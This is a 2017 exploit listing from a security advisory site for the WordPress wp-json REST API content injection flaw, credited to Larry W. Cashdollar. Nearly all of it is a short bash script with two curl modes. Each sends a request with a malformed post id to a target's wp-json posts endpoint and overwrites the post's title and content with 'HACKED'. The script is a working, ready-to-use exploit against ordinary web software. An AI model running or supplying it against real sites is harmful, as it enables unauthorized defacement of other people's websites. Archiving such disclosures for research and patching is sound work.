WordPress wp-json Content Injection

Published
Credit
Risk
2017.02.09
Larry W. Cashdollar
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

#!/bin/bash
#Wordpress wp_Json API exploit
#Larry W. Cashdollar
#Discovered by Marc Montipas
#http://www.vapidlabs.com/exploits/wordpress_exploit.sh.txt
#https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html?utm_campaign=wp472vuln
#Usage ./exp.sh target 1 or 2

if [ $2 == 2 ]
then
curl -s --url "http://$1/index.php/wp-json/wp/v2/posts/12345?id=1T" --data 'title=HACKED&content=HACKED' | indent
fi

if [ $2 == 1 ]
then
curl -s -X POST --url "http://$1/index.php/wp-json/wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent
fi


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com